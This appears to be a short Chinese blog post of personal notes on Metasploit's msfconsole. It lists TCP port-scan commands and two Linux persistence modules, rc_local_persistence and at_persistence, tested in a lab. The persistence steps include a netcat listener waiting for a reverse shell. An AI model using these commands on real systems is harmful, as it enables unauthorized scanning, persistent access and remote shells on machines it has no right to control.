前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >msfconsole

msfconsole

原创
作者头像
浪子云
修改2022-03-17 19:00:37
3760
修改2022-03-17 19:00:37
举报
文章被收录于专栏:子云笔记
代码语言:javascript
复制
端口扫描
msf6 > search portscan
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set ports 1-2048
ports => 1-2048
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.1.191
rhosts => 192.168.1.191
msf6 auxiliary(scanner/portscan/tcp) > set threads 10
threads => 10
msf6 auxiliary(scanner/portscan/tcp) > run

测试机:ubuntu16-server,存在/etc/rc.local
此模块将编辑 /etc/rc.local 以保留有效负载。有效负载将在下次重新启动时执行
exploit/linux/local/rc_local_persistence
set SESSION session-id
set lhost 攻击者ip
set lport 4444
攻击者:nc -lvvp 4444
重启受害者机器测试

此模块通过 at 执行有效负载来实现持久性
exploit/unix/local/at_persistence
set SESSION session-id
exploit
不用新建nc进行端口监听测试,直接等待2s,直接输入whoami验证

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
作者已关闭评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档